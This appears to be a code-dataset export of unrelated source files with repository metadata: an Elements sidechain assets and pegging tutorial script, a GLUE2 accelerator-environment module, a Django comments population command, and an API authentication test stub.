e1.getwalletinfo()
e1.listunspent(1, 1)
e1.gettransaction(txid)
# Let's build a blinded 2-of-2 multisig p2sh address
# 1) Get unblinded addresses from each participant
addr1 = e1.getaddressinfo(e1.getnewaddress())["unconfidential"]
addr2 = e2.getaddressinfo(e2.getnewaddress())["unconfidential"]
# 2) Get blinding keys, private and public
addrinfo1 = e1.getaddressinfo(e1.getnewaddress())
addrinfo2 = e2.getaddressinfo(addr2)
blindingkey = e1.dumpblindingkey(addrinfo1["address"])
blindingpubkey = addrinfo1["confidential_key"]
# 3) Make multisig address like usual
multisig = e1.createmultisig(2, [addrinfo1["pubkey"], addrinfo2["pubkey"]])
# 4) Blind the address using the blinding pubkey
blinded_addr = e1.createblindedaddress(multisig["address"], blindingpubkey)
e1.importaddress(multisig["redeemScript"], "", True, True) # Make sure p2sh addr is added
e2.importaddress(multisig["redeemScript"], "", True, True)
e1.importaddress(blinded_addr)
e2.importaddress(blinded_addr)
# 5) Now the address can be funded, though e2 will not be able to see values
txid = e1.sendtoaddress(blinded_addr, 1)
sync_all(e1, e2)
e2.gettransaction(txid, True)
# 6) Import the blinding privkey and decode the values
e2.importblindingkey(blinded_addr, blindingkey)
e2.gettransaction(txid, True)
# ASSETS
# Many of the RPC calls have added asset type or label
# arguments and reveal alternative asset information. With no argument all are listed:
e1.getwalletinfo()
# Notice we now see "bitcoin" as an asset. This is the asset label for the hex for "bitcoin" which can be discovered:
e1.dumpassetlabels()
# We can also issue our own assets, 1 asset and 1 reissuance token in this case
issue = e1.issueasset(1, 1)
asset = issue["asset"]
# From there you can look at the issuances you have in your wallet
e1.listissuances()
# If you gave `issueasset` a reissuance token argument greater than 0
# you can also reissue the base asset
e1.reissueasset(asset, 1)
# or make another different unblinded asset issuance, with only reissuance tokens initially
e1.issueasset(0, 1, False)
# Then two issuances for that particular asset will show
e1.listissuances(asset)
# To label any asset add a new argument like this to your elements.conf file
# then restart your daemon:
assetentry = "-assetdir="+asset+":namedasset"
# Wallet labels have no consensus meaning, only local node/wallet meaning
sync_all(e1, e2)
e1.stop()
time.sleep(5)
# Restart with a new asset label
e1 = startelementsd(e1_datadir, e1conf, assetentry)
time.sleep(5)
e1.getwalletinfo()
# To send issued assets, add an additional argument to sendtoaddress using the hex or label
e1.sendtoaddress(address=e2.getnewaddress(), amount=1, assetlabel="namedasset")
# Reissuance tokens can also be sent like any other asset
e1.sendtoaddress(address=e2.getnewaddress(), amount=1, assetlabel=issue["token"])
sync_all(e1, e2)
# e2 wallet doesn't know about label, just an unnamed asset
e2.getwalletinfo()["unconfirmed_balance"][asset]
e2.generatetoaddress(1, e2.getnewaddress())
sync_all(e1, e2)
# e2 maybe doesn't know about the issuance for the transaction sending him the new asset
e2.listissuances()
# let's import an associated address(so the wallet captures issuance transaction) and rescan
txid = issue["txid"]
addr = e1.gettransaction(txid)["details"][0]["address"]
e2.importaddress(addr)
# e2 now sees issuance, but doesn't know amounts as they are blinded
e2.listissuances()
# We need to import the issuance blinding key. We refer to issuances by their txid/vin pair
# as there is only one per input
vin = issue["vin"]
issuekey = e1.dumpissuanceblindingkey(txid, vin)
e2.importissuanceblindingkey(txid, vin, issuekey)
# Now e2 can see issuance amounts and blinds
e2.listissuances()
# Since it was also sent a reissuance token, it can reissue the base asset
e2.reissueasset(issue["asset"], 5)
# Reissuing reissuance tokens is currently not supported
try:
e2.reissueasset(issue["token"], 1)
except JSONRPCException:
pass
# For de-issuance, we can send assets or issuance tokens to an OP_RETURN output, provably burning them
e2.destroyamount(issue["asset"], 5)
# BLOCKSIGNING
# Recall blocksigning is OP_TRUE
e1.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Let's set it to something more interesting... 2-of-2 multisig
# First lets get some keys from both clients to make our block "challenge"
addr1 = e1.getnewaddress()
addr2 = e2.getnewaddress()
valid1 = e1.getaddressinfo(addr1)
pubkey1 = valid1["pubkey"]
valid2 = e2.getaddressinfo(addr2)
pubkey2 = valid2["pubkey"]
key1 = e1.dumpprivkey(addr1)
key2 = e2.dumpprivkey(addr2)
e1.stop()
e2.stop()
time.sleep(5)
# Now filled with the pubkeys as 2-of-2 checkmultisig
signblockarg="-signblockscript=5221"+pubkey1+"21"+pubkey2+"52ae"
# Anti-DoS argument, custom chain default is ~1 sig so let's make it at least 2 sigs
blocksign_max_size="-con_max_block_sig_size=150"
dyna_deploy_start="-con_dyna_deploy_start=0"
extra_args=signblockarg+" "+blocksign_max_size+" "+dyna_deploy_start
# Wipe out datadirs, start over
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
# Copy back config files
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
e1 = startelementsd(e1_datadir, e1conf, extra_args)
e2 = startelementsd(e2_datadir, e2conf, extra_args)
time.sleep(5)
sync_all(e1, e2)
# Now import signing keys
e1.importprivkey(key1)
e2.importprivkey(key2)
# Generate no longer works, even if keys are in wallet
try:
e1.generatetoaddress(1, e1.getnewaddress())
raise Exception("Generate shouldn't work")
except JSONRPCException:
pass
try:
e1.generatetoaddress(1, e1.getnewaddress())
raise Exception("Generate shouldn't work")
except JSONRPCException:
pass
# Let's propose and accept some blocks, e1 is master!
blockhex = e1.getnewblockhex()
# Unsigned is no good
# 0 before, 0 after
e1.getblockcount() == 0
e1.submitblock(blockhex)
# Still 0
e1.getblockcount() == 0
# Signblock tests validity except block signatures
# This signing step can be outsourced to a HSM signing to enforce business logic of any sort
# See Strong Federations paper
sign1 = e1.signblock(blockhex)
sign2 = e2.signblock(blockhex)
# We now can gather signatures any way you want, combine them into a fully signed block
blockresult = e1.combineblocksigs(blockhex, [sign1[0], sign2[0]])
blockresult["complete"] == True
signedblock = blockresult["hex"]
# Now submit the block, doesn't matter who
e2.submitblock(signedblock)
sync_all(e1, e2)
# We now have moved forward one block!
e1.getblockcount() == 1
e2.getblockcount() == 1
e1.stop()
e2.stop()
time.sleep(5)
# Further Exercises:
# - Make a python script that does round-robin consensus
# Pegging
# Everything pegging related can be done inside the Elements daemon directly, except for
# pegging out. This is due to the multisig pool aka Watchmen that controls the bitcoin
# on the Bitcoin blockchain. That is the easiest part to get wrong, and by far the most
# important as there is no going back if you lose the funds.
# Wipe out datadirs, start over
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
os.makedirs(e1_datadir)
os.makedirs(e2_datadir)
# Copy back config files
shutil.copyfile("contrib/assets_tutorial/elements1.conf", e1_datadir+"/elements.conf")
shutil.copyfile("contrib/assets_tutorial/elements2.conf", e2_datadir+"/elements.conf")
fedpegarg="-fedpegscript=5221"+pubkey1+"21"+pubkey2+"52ae"
# Back to OP_TRUE blocks, re-using pubkeys for pegin pool instead
# Keys can be the same or different, doesn't matter
e1 = startelementsd(e1_datadir, e1conf, fedpegarg)
e2 = startelementsd(e2_datadir, e2conf, fedpegarg)
time.sleep(5)
# Mature some outputs on each side
e1.generatetoaddress(101, e1.getnewaddress())
bitcoin.generatetoaddress(101, bitcoin.getnewaddress())
sync_all(e1, e2)
# Now we can actually start pegging in. Examine the pegin address fields
e1.getpeginaddress()
# Changes each time as it's a new sidechain address as well as new "tweak" for the watchmen keys
# mainchain_address : where you send your bitcoin from Bitcoin network
# sidechain_address : where the bitcoin will end up on the sidechain after pegging in
# Each call of this takes the pubkeys defined in the config file, adds a random number to them
# that is essetially the hash of the sidechain_address and other information,
# then creates a new P2SH Bitcoin address from that. We reveal that "tweak" to the functionaries
# during `claimpegin`, then they are able to calculate the necessary private key and control
# funds.
addrs = e1.getpeginaddress()
#Send funds to unique watchmen P2SH address
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
# Confirmations in Bitcoin are what protects the
# sidechain from becoming fractional reserve during reorgs.
bitcoin.generatetoaddress(101, bitcoin.getnewaddress())
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
# Attempt claim!
claimtxid = e1.claimpegin(raw, proof, addrs["claim_script"])
sync_all(e1, e2)
# Other node should accept to mempool and mine
e2.generatetoaddress(1, e1.getnewaddress())
sync_all(e1, e2)
# Should see confirmations
"confirmations" in e1.getrawtransaction(claimtxid, 1)
# Pegging Out
# This command would trigger watchmen to send payment to Bitcoin address on mainchain
# The Bitcoin-side functionality is not supported directly in Elements.
# The watchmen will notice this transaction and send the funds from their collective
# wallet.
e1.sendtomainchain(bitcoin.getnewaddress(), 10)
#Exercise(s)
#1. Implement really dumb/unsafe watchmen to allow pegouts for learning purposes
# Recover tweak from pegin, add to privkey, combined tweaked pubkeys into a redeemscript, add to Core wallet
# RAW API
# Let's create a basic transaction using the raw api, blind it, sign, and send
# Create a transaction with a single destination output to other wallet
rawtx = e1.createrawtransaction([], {e2.getnewaddress():100})
# Biggest difference compared to Bitcoin is that we have explicit fee outputs
rawtx2 = e1.createrawtransaction([], {e2.getnewaddress():100, e1.getnewaddress():5, "fee":Decimal("0.1")})
# Fee outputs are unblinded, with a scriptPubKey of "", in other words ""
# scriptPubKeys are unspendable
# Next we can fund the transaction (and replaces fee with something more appropriate)
fundedtx = e1.fundrawtransaction(rawtx2)
# Blind
blindedtx = e1.blindrawtransaction(fundedtx["hex"])
# *Warning*: Raw blinding logic can be quite complicated, requiring the use of `ignoreblindfails`
# to avoid having calls fail without manually inspecting transactions in great detail.
# In general any transaction with 2 or more outputs to blind should succeed, so adding additional
# is one strategy to resolve this.
# Sign
signedtx = e1.signrawtransactionwithwallet(blindedtx)
# And send
txid = e1.sendrawtransaction(signedtx["hex"])
sync_all(e1, e2)
e2.gettransaction(txid)
# ADVANCED OPTIONS
# rawblindrawtransaction : blind a raw transaction with no access to a wallet
# -policyasset=<hex> : set network fee asset type to something other than BTC
bitcoin.stop()
e1.stop()
e2.stop()
time.sleep(2)
shutil.rmtree(e1_datadir)
shutil.rmtree(e2_datadir)
|
mit
| -7,510,705,342,911,157,000
| 32.547244
| 124
| 0.756132
| false
| 3.207
| true
| false
| false
|
ericblau/ipf-xsede
|
ipf/glue2/accelerator_environment.py
|
1
|
26893
|
###############################################################################
# Copyright 2011-2014 The University of Texas at Austin #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
###############################################################################
import subprocess
import datetime
import json
import os
import re
import socket
import time
import copy
from xml.dom.minidom import getDOMImplementation
from ipf.data import Data, Representation
from ipf.dt import *
from ipf.error import StepError
from ipf.sysinfo import ResourceName
from ipf.sysinfo import Platform
from .resource import *
from .step import GlueStep
#######################################################################################################################
class AcceleratorEnvironmentsStep(GlueStep):
def __init__(self):
GlueStep.__init__(self)
self.description = "Produces a document containing one or more GLUE 2 AcceleratorEnvironment. For a batch scheduled system, an ExecutionEnivonment is typically a compute node."
self.time_out = 30
self.requires = [ResourceName, Platform]
self.produces = [AcceleratorEnvironments]
self._acceptParameter("queues",
"An expression describing the queues to include (optional). The syntax is a series of +<queue> and -<queue> where <queue> is either a queue name or a '*'. '+' means include '-' means exclude. The expression is processed in order and the value for a queue at the end determines if it is shown.",
False)
self.resource_name = None
def run(self):
self.resource_name = self._getInput(ResourceName).resource_name
host_groups = self._run()
if host_groups:
for host_group in host_groups:
host_group.id = "%s.%s" % (host_group.Name, self.resource_name)
host_group.ID = "urn:glue2:AcceleratorEnvironment:%s.%s" % (
host_group.Name, self.resource_name)
host_group.ManagerID = "urn:glue2:ComputingManager:%s" % (
self.resource_name)
self.debug("host_group.id "+host_group.id)
self.debug("host_group.uas " +
str(host_group.UsedAcceleratorSlots))
self._output(AcceleratorEnvironments(self.resource_name, host_groups))
def _shouldUseName(self, hosts):
names = set()
for host in hosts:
names.add(host.Name)
if len(names) == 1 or len(names) < len(hosts):
return True
else:
return False
def _groupHosts(self, hosts):
use_name = self._shouldUseName(hosts)
host_groups = []
for host in hosts:
for host_group in host_groups:
if host.sameHostGroup(host_group, use_name):
if "UsedAverageLoad" in host.Extension:
host_load = host.Extension["UsedAverageLoad"]
if "UsedAverageLoad" not in host_group.Extension:
host_group.Extension["UsedAverageLoad"] = host_load
else:
host_group_load = host_group.Extension["UsedAverageLoad"]
host_group_load = (host_group_load * host_group.UsedInstances +
host_load * host.UsedInstances) / \
(host_group.UsedInstances + host.UsedInstances)
host_group.Extension["UsedAverageLoad"] = host_group_load
if "AvailableAverageLoad" in host.Extension:
host_load = host.Extension["AvailableAverageLoad"]
if "AvailableAverageLoad" not in host_group.Extension:
host_group.Extension["AvailableAverageLoad"] = host_load
else:
host_group_load = host_group.Extension["AvailableAverageLoad"]
host_group_avail = host_group.TotalInstances - host_group.UsedInstances - \
host_group.UnavailableInstances
host_avail = host.TotalInstances - host.UsedInstances - host.UnavailableInstances
host_group_load = (host_group_load * host_group_avail + host_load * host_avail) / \
(host_group_avail + host_group_avail)
host_group.Extension["AvailableAverageLoad"] = host_group_load
if "PartiallyUsedInstances" in host.Extension:
if "PartiallyUsedInstances" not in host_group.Extension:
host_group.Extension["PartiallyUsedInstances"] = host.Extension["PartiallyUsedInstances"]
else:
host_group.Extension["PartiallyUsedInstances"] = \
host_group.Extension["PartiallyUsedInstances"] + \
host.Extension["PartiallyUsedInstances"]
host_group.TotalInstances += host.TotalInstances
host_group.UsedInstances += host.UsedInstances
host_group.UnavailableInstances += host.UnavailableInstances
# if host_group.UsedAcceleratorSlots is None:
# host_group.UsedAcceleratorSlots = 0
# if host.UsedAcceleratorSlots is None:
# host.UsedAcceleratorSlots = 0
host_group.UsedAcceleratorSlots += host.UsedAcceleratorSlots
if host_group.TotalAcceleratorSlots is None:
host_group.TotalAcceleratorSlots = 0
host_group.TotalAcceleratorSlots += host.PhysicalAccelerators
host = None
break
if host is not None:
host_groups.append(host)
if not use_name:
host.Name = "NodeType%d" % len(host_groups)
return host_groups
def _run(self):
raise StepError("AcceleratorEnvironmentsStep._run not overriden")
def _goodHost(self, host):
# check that it has gpu information
if host.PhysicalAccelerators == None:
return False
# if the host is associated with a queue, check that it is a good one
if len(host.ShareID) == 0:
return True
for share in host.ShareID:
m = re.search("urn:glue2:ComputingShare:(\S+).%s" %
self.resource_name, share)
if self._includeQueue(m.group(1)):
return True
# if the host is associated with a partition, check that it is a good one
if len(host.Partitions) == 0:
return True
partition_list = host.Partitions.split(',')
for share in partition_list:
if self._includeQueue(share):
return True
return False
#######################################################################################################################
class AcceleratorEnvironment(Resource):
def __init__(self):
Resource.__init__(self)
self.Platform = "unknown" # string (Platform_t)
self.VirtualMachine = None # boolean (ExtendedBoolean)
self.TotalInstances = None # integer
self.UsedInstances = None # integer
self.UnavailableInstances = None # integer
self.PhysicalCPUs = None # integer
self.LogicalCPUs = None # integer
self.CPUMultiplicity = None # integer (CPUMultiplicity)
self.CPUVendor = None # string
self.CPUModel = None # string
self.CPUVersion = None # string
self.CPUClockSpeed = None # integer (MHz)
self.CPUTimeScalingFactor = None # float
self.WallTimeScalingFactor = None # float
self.MainMemorySize = 0 # integer (MB)
self.VirtualMemorySize = None # integer (MB)
self.OSFamily = "unknown" # string (OSFamily)
self.OSName = None # string (OSName)
self.OSVersion = None # string
self.ConnectivityIn = None # boolean (ExtendedBoolean)
self.ConnectivityOut = None # boolean (ExtendedBoolean)
self.NetworkInfo = None # string (NetworkInfo)
# use Manager, Share, Activity from Resource, not ComputingManager, ComputingShare, ComputingActivity
self.ApplicationEnvironmentID = [] # list of string (ID)
self.BenchmarkID = [] # list of string (ID)
# For AcceleratorEnvironment, but kludging here for node purposes
self.Type = "unknown" # string (AccType_t)
self.PhysicalAccelerators = None # integer
self.UsedAcceleratorSlots = None # integer
self.TotalAcceleratorSlots = None # integer
self.LogicalAccelerators = None # integer
self.Vendor = None # string
self.Model = None # string
self.Version = None # string
self.ClockSpeed = None # integer (MHz)
self.Memory = 0 # integer (MB)
self.ComputeCapability = None # string (describes CUDA features)
# set defaults to be the same as the host where this runs
(sysName, nodeName, release, version, machine) = os.uname()
self.Platform = machine
self.OSFamily = sysName.lower()
self.OSName = sysName.lower()
self.OSVersion = release
def __str__(self):
return json.dumps(AcceleratorEnvironmentOgfJson(self).toJson(), sort_keys=True, indent=4)
def sameHostGroup(self, accel_env, useName):
if useName and self.Name != accel_env.Name:
return False
if self.Platform != accel_env.Platform:
return False
if self.PhysicalCPUs != accel_env.PhysicalCPUs:
return False
if self.LogicalCPUs != accel_env.LogicalCPUs:
return False
if self.CPUVendor != accel_env.CPUVendor:
return False
if self.CPUModel != accel_env.CPUModel:
return False
if self.CPUVersion != accel_env.CPUVersion:
return False
if self.CPUClockSpeed != accel_env.CPUClockSpeed:
return False
if self.MainMemorySize != accel_env.MainMemorySize:
return False
# if self.VirtualMemorySize != accel_env.VirtualMemorySize:
# return False
if self.OSFamily != accel_env.OSFamily:
return False
if self.OSName != accel_env.OSName:
return False
if self.OSVersion != accel_env.OSVersion:
return False
if len(self.ShareID) != len(accel_env.ShareID):
return False
for share in self.ShareID:
if not share in accel_env.ShareID:
return False
return True
#######################################################################################################################
class AcceleratorEnvironmentTeraGridXml(ResourceTeraGridXml):
data_cls = AcceleratorEnvironment
def __init__(self, data):
ResourceTeraGridXml.__init__(self, data)
def get(self):
return self.toDom().toxml()
def toDom(self):
doc = getDOMImplementation().createDocument("http://info.teragrid.org/glue/2009/02/spec_2.0_r02",
"Entities", None)
root = doc.createElement("AcceleratorEnvironment")
doc.documentElement.appendChild(root)
self.addToDomElement(doc, root)
return doc
def addToDomElement(self, doc, element):
ResourceTeraGridXml.addToDomElement(self, doc, element)
if self.data.Platform is not None:
e = doc.createElement("Platform")
e.appendChild(doc.createTextNode(self.data.Platform))
element.appendChild(e)
if self.data.VirtualMachine is not None:
e = doc.createElement("VirtualMachine")
if self.data.VirtualMachine:
e.appendChild(doc.createTextNode("true"))
else:
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.TotalInstances is not None:
e = doc.createElement("TotalInstances")
e.appendChild(doc.createTextNode(str(self.data.TotalInstances)))
element.appendChild(e)
if self.data.UsedInstances is not None:
e = doc.createElement("UsedInstances")
e.appendChild(doc.createTextNode(str(self.data.UsedInstances)))
element.appendChild(e)
if self.data.UnavailableInstances is not None:
e = doc.createElement("UnavailableInstances")
e.appendChild(doc.createTextNode(
str(self.data.UnavailableInstances)))
element.appendChild(e)
if self.data.PhysicalCPUs is not None:
e = doc.createElement("PhysicalCPUs")
e.appendChild(doc.createTextNode(str(self.data.PhysicalCPUs)))
element.appendChild(e)
if self.data.PhysicalAccelerators is not None:
e = doc.createElement("PhysicalAccelerators")
e.appendChild(doc.createTextNode(
str(self.data.PhysicalAccelerators)))
element.appendChild(e)
if self.data.UsedAcceleratorSlots is not None:
e = doc.createElement("UsedAcceleratorSlots")
e.appendChild(doc.createTextNode(
str(self.data.UsedAcceleratorSlots)))
element.appendChild(e)
if self.data.LogicalCPUs is not None:
e = doc.createElement("LogicalCPUs")
e.appendChild(doc.createTextNode(str(self.data.LogicalCPUs)))
element.appendChild(e)
if self.data.CPUMultiplicity is not None:
e = doc.createElement("CPUMultiplicity")
e.appendChild(doc.createTextNode(self.data.CPUMultiplicity))
element.appendChild(e)
if self.data.CPUVendor is not None:
e = doc.createElement("CPUVendor")
e.appendChild(doc.createTextNode(self.data.CPUVendor))
element.appendChild(e)
if self.data.CPUModel is not None:
e = doc.createElement("CPUModel")
e.appendChild(doc.createTextNode(self.data.CPUModel))
element.appendChild(e)
if self.data.CPUVersion is not None:
e = doc.createElement("CPUVersion")
e.appendChild(doc.createTextNode(self.data.CPUVersion))
element.appendChild(e)
if self.data.CPUClockSpeed is not None:
e = doc.createElement("CPUClockSpeed")
e.appendChild(doc.createTextNode(str(self.data.CPUClockSpeed)))
element.appendChild(e)
if self.data.CPUTimeScalingFactor is not None:
e = doc.createElement("CPUTimeScalingFactor")
e.appendChild(doc.createTextNode(
str(self.data.CPUTimeScalingFactor)))
element.appendChild(e)
if self.data.WallTimeScalingFactor is not None:
e = doc.createElement("WallTimeScalingFactor")
e.appendChild(doc.createTextNode(
str(self.data.WallTimeScalingFactor)))
element.appendChild(e)
if self.data.MainMemorySize is not None:
e = doc.createElement("MainMemorySize")
e.appendChild(doc.createTextNode(str(self.data.MainMemorySize)))
element.appendChild(e)
if self.data.VirtualMemorySize is not None:
e = doc.createElement("VirtualMemorySize")
e.appendChild(doc.createTextNode(str(self.data.VirtualMemorySize)))
element.appendChild(e)
if self.data.OSFamily is not None:
e = doc.createElement("OSFamily")
e.appendChild(doc.createTextNode(self.data.OSFamily))
element.appendChild(e)
if self.data.OSName is not None:
e = doc.createElement("OSName")
e.appendChild(doc.createTextNode(self.data.OSName))
element.appendChild(e)
if self.data.OSVersion is not None:
e = doc.createElement("OSVersion")
e.appendChild(doc.createTextNode(self.data.OSVersion))
element.appendChild(e)
if self.data.ConnectivityIn == None:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("undefined"))
element.appendChild(e)
elif self.data.ConnectivityIn:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("true"))
element.appendChild(e)
else:
e = doc.createElement("ConnectivityIn")
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.ConnectivityOut == None:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("undefined"))
element.appendChild(e)
elif self.data.ConnectivityOut:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("true"))
element.appendChild(e)
else:
e = doc.createElement("ConnectivityOut")
e.appendChild(doc.createTextNode("false"))
element.appendChild(e)
if self.data.NetworkInfo is not None:
e = doc.createElement("NetworkInfo")
e.appendChild(doc.createTextNode(self.data.NetworkInfo))
element.appendChild(e)
if self.data.ManagerID is not None:
e = doc.createElement("ComputingManager")
e.appendChild(doc.createTextNode(self.data.ManagerID))
element.appendChild(e)
for share in self.data.ShareID:
e = doc.createElement("ComputingShare")
e.appendChild(doc.createTextNode(share))
element.appendChild(e)
for activity in self.data.ActivityID:
e = doc.createElement("ComputingActivity")
e.appendChild(doc.createTextNode(activity))
element.appendChild(e)
for appEnv in self.data.ApplicationEnvironmentID:
e = doc.createElement("ApplicationEnvironment")
e.appendChild(doc.createTextNode(appEnv))
element.appendChild(e)
for benchmark in self.data.BenchmarkID:
e = doc.createElement("Benchmark")
e.appendChild(doc.createTextNode(benchmark))
element.appendChild(e)
#######################################################################################################################
class AcceleratorEnvironmentOgfJson(ResourceOgfJson):
data_cls = AcceleratorEnvironment
def __init__(self, data):
ResourceOgfJson.__init__(self, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
doc = ResourceOgfJson.toJson(self)
doc["Platform"] = self.data.Platform
if self.data.VirtualMachine is not None:
doc["VirtualMachine"] = self.data.VirtualMachine
if self.data.TotalInstances is not None:
doc["TotalInstances"] = self.data.TotalInstances
if self.data.UsedInstances is not None:
doc["UsedInstances"] = self.data.UsedInstances
if self.data.UnavailableInstances is not None:
doc["UnavailableInstances"] = self.data.UnavailableInstances
if self.data.PhysicalCPUs is not None:
doc["PhysicalCPUs"] = self.data.PhysicalCPUs
if self.data.PhysicalAccelerators is not None:
doc["PhysicalAccelerators"] = self.data.PhysicalAccelerators
if self.data.UsedAcceleratorSlots is not None:
doc["UsedAcceleratorSlots"] = self.data.UsedAcceleratorSlots
if self.data.LogicalCPUs is not None:
doc["LogicalCPUs"] = self.data.LogicalCPUs
if self.data.CPUMultiplicity is not None:
doc["CPUMultiplicity"] = self.data.CPUMultiplicity
if self.data.CPUVendor is not None:
doc["CPUVendor"] = self.data.CPUVendor
if self.data.CPUModel is not None:
doc["CPUModel"] = self.data.CPUModel
if self.data.CPUVersion is not None:
doc["CPUVersion"] = self.data.CPUersion
if self.data.CPUClockSpeed is not None:
doc["CPUClockSpeed"] = self.data.CPUClockSpeed
if self.data.CPUTimeScalingFactor is not None:
doc["CPUTimeScalingFactor"] = self.data.CPUTimeScalingFactor
if self.data.WallTimeScalingFactor is not None:
doc["WallTimeScalingFactor"] = self.data.WallTimeScalingFactor
doc["MainMemorySize"] = self.data.MainMemorySize
if self.data.VirtualMemorySize is not None:
doc["VirtualMemorySize"] = self.data.VirtualMemorySize
doc["OSFamily"] = self.data.OSFamily
if self.data.OSName is not None:
doc["OSName"] = self.data.OSName
if self.data.OSVersion is not None:
doc["OSVersion"] = self.data.OSVersion
doc["ConnectivityIn"] = self.data.ConnectivityIn
doc["ConnectivityOut"] = self.data.ConnectivityOut
if self.data.NetworkInfo is not None:
doc["NetworkInfo"] = self.data.NetworkInfo
if len(self.data.ApplicationEnvironmentID) > 0:
doc["ApplicationEnvironmentID"] = self.data.ApplicationEnvironmentID
if len(self.data.BenchmarkID) > 0:
doc["BenchmarkID"] = self.BenchmarkID
return doc
#######################################################################################################################
# class AcceleratorEnvironmentOgfJson(ResourceOgfJson):
# data_cls = AcceleratorEnvironment
#
# def __init__(self, data):
# ResourceOgfJson.__init__(self,data)
#
# def get(self):
# return json.dumps(self.toJson(),sort_keys=True,indent=4)
#
# def toJson(self):
# doc = ResourceOgfJson.toJson(self)
#
# doc["Platform"] = self.data.Platform
# if self.data.PhysicalAccelerators is not None:
# doc["PhysicalAccelerators"] = self.data.PhysicalAccelerators
# if self.data.LogicalAccelerators is not None:
# doc["LogicalAccelerators"] = self.data.LogicalAccelerators
# if self.data.Vendor is not None:
# doc["Vendor"] = self.data.Vendor
# if self.data.Model is not None:
# doc["Model"] = self.data.Model
# if self.data.Version is not None:
# doc["Version"] = self.data.Version
# if self.data.ClockSpeed is not None:
# doc["ClockSpeed"] = self.data.ClockSpeed
# if self.data.Memory is not None:
# doc["Memory"] = self.data.Memory
# if self.data.ComputeCapability is not None:
# doc["ComputeCapability"] = self.data.ComputeCapability
#
# return doc
#######################################################################################################################
class AcceleratorEnvironments(Data):
def __init__(self, id, accel_envs=[]):
Data.__init__(self, id)
self.accel_envs = accel_envs
#######################################################################################################################
class AcceleratorEnvironmentsOgfJson(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(
self, Representation.MIME_APPLICATION_JSON, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
eedoc = []
for accel_env in self.data.accel_envs:
eedoc.append(AcceleratorEnvironmentOgfJson(accel_env).toJson())
return eedoc
#######################################################################################################################
# class AcceleratorEnvironments(Data):
# def __init__(self, id, accel_envs=[]):
# Data.__init__(self,id)
# self.accel_envs = accel_envs
#######################################################################################################################
class AcceleratorEnvironmentsTeraGridXml(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(self, Representation.MIME_TEXT_XML, data)
def get(self):
return self.toDom().toprettyxml()
def toDom(self):
doc = getDOMImplementation().createDocument("http://info.teragrid.org/glue/2009/02/spec_2.0_r02",
"Entities", None)
for accel_env in self.data.accel_envs:
eedoc = AcceleratorEnvironmentTeraGridXml.toDom(accel_env)
doc.documentElement.appendChild(eedoc.documentElement.firstChild)
return doc
#######################################################################################################################
class AcceleratorEnvironmentsOgfJson(Representation):
data_cls = AcceleratorEnvironments
def __init__(self, data):
Representation.__init__(
self, Representation.MIME_APPLICATION_JSON, data)
def get(self):
return json.dumps(self.toJson(), sort_keys=True, indent=4)
def toJson(self):
eedoc = []
for accel_env in self.data.accel_envs:
eedoc.append(AcceleratorEnvironmentOgfJson(accel_env).toJson())
return eedoc
#######################################################################################################################
|
apache-2.0
| 4,658,216,852,875,104,000
| 44.581356
| 324
| 0.562451
| false
| 4.516795
| false
| false
| false
|
danirus/django-comments-xtd
|
django_comments_xtd/management/commands/populate_xtdcomments.py
|
1
|
1794
|
import sys
from django.db import connections
from django.db.utils import ConnectionDoesNotExist, IntegrityError
from django.core.management.base import BaseCommand
from django_comments.models import Comment
from django_comments_xtd.models import XtdComment
__all__ = ['Command']
class Command(BaseCommand):
help = "Load the xtdcomment table with valid data from django_comments."
def add_arguments(self, parser):
parser.add_argument('using', nargs='*', type=str)
def populate_db(self, cursor):
for comment in Comment.objects.all():
sql = ("INSERT INTO %(table)s "
" ('comment_ptr_id', 'thread_id', 'parent_id',"
" 'level', 'order', 'followup') "
"VALUES (%(id)d, %(id)d, %(id)d, 0, 1, FALSE)")
cursor.execute(sql % {'table': XtdComment._meta.db_table,
'id': comment.id})
def handle(self, *args, **options):
total = 0
using = options['using'] or ['default']
for db_conn in using:
try:
self.populate_db(connections[db_conn].cursor())
total += XtdComment.objects.using(db_conn).count()
except ConnectionDoesNotExist:
print("DB connection '%s' does not exist." % db_conn)
continue
except IntegrityError:
if db_conn != 'default':
print("Table '%s' (in '%s' DB connection) must be empty."
% (XtdComment._meta.db_table, db_conn))
else:
print("Table '%s' must be empty."
% XtdComment._meta.db_table)
sys.exit(1)
print("Added %d XtdComment object(s)." % total)
|
bsd-2-clause
| 8,801,720,226,856,467,000
| 36.375
| 77
| 0.541806
| false
| 4.181818
| false
| false
| false
|
bradleygolden/userapi
|
tests/test_api.py
|
1
|
5577
|
from app import verify_password, validate_token, User
import json
from base64 import b64encode
def auth_headers(username, password):
username_password = "%s:%s" % (username, password)
headers = {
'Authorization': 'Basic %s' % b64encode(username_password.encode()).decode("ascii")
}
return headers
def test_verify_password_callback(test_client, app, user):
username = user.username
password = 'password'
token = user.generate_auth_token()
# test username, password, token as auth headers
with app.test_request_context():
assert verify_password(username, password) is True
assert verify_password(token) is True
